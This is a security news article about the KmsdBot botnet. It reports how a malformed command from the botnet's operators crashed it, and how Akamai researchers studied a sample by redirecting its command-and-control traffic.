"This activity usually goes under the radar of conventional solutions," Villadiego says. "That’s why modern attacks require paying attention to precursors and to act decisively against threats like infostealers."

Infostealer Malware Market Booms, as MFA Fatigue Sets In

A single improperly formatted command has effectively killed KmsdBot botnet, security vendor says.

It's not often that malware authors go through the effort of creating a malicious tool for assembling a botnet, only to then find a way to effectively sabotage it themselves.

But that appears to be precisely the case with "KmsdBot," a distributed denial-of-service (DDoS) and cryptomining botnet that researchers from Akamai found infecting systems across multiple industries last month. Now, it has since gone largely silent because of a single improperly formatted command on the part of its author.

**A Versatile Threat**

The malware, written in the Go programming language, infects systems via an SSH connection with weak credentials and uses UDP, TCP, and HTTP POST and GET commands in DDoS attacks. Kaspersky found the malware is designed to target multiple architectures such as Windows, Arm64, and mips64 systems. Among those the malware has affected are luxury car makers, gaming companies, and IT firms.

In all the attacks that Akamai observed, the threat actors used KmsdBot to execute DDoS attacks, though the malware also contains cryptomining functionality.

Following Akamai's initial disclosure in November, researchers from the company continued to monitor and analyze the threat. As part of the exercise, they modified a recent sample of KmsdBot and decided to test various scenarios related to the malware's command and control (C2) functionality.

The Akamai researchers found the spot in the malware's code that contained the IP address and port for KmsdBot's C2 server and modified it, so the address pointed to Akamai's IP space. The goal was to have a controlled environment from where the researchers could send their own commands to the bot sample to see how it worked.

**A Fatal Oopsie**

During the testing, the Akamai researchers discovered the bot suddenly stopped working after receiving a command to send a bunch of junk data to bitcoin.com, in an apparent bid to DDoS the website.

A closer look showed the command to be malformed. "The guys running the botnet crashed it by accident," Larry Cashdollar, principal security intelligence response engineer at Akamai, tells Dark Reading. "They sent in a command that was missing a space between the target URL and port number."

The bot does not contain any error-checking functionality to verify if the commands it receives are properly formatted, Cashdollar says. As a result, the Go binary crashes with an "index out of range" error message.

He also says that Akamai was able to replicate the issue by sending the bot it had modified an improperly formatted command of its own. 

"This malformed command likely crashed all the botnet code that was running on infected machines and talking to the C2 — essentially, killing the botnet," Akamai noted in its update on the malware this week.

Importantly, the bot does not support any persistence mechanism. So, the only way for the malware authors to rebuild the KmsdBot botnet is to reinfect systems from scratch.

Cashdollar says almost all of the KmsdBot-related activity that Akamai was tracking over the past several weeks has ceased. But there are signs that the threat actors have begun attempting to infect systems again, he notes.

Tag

#botnet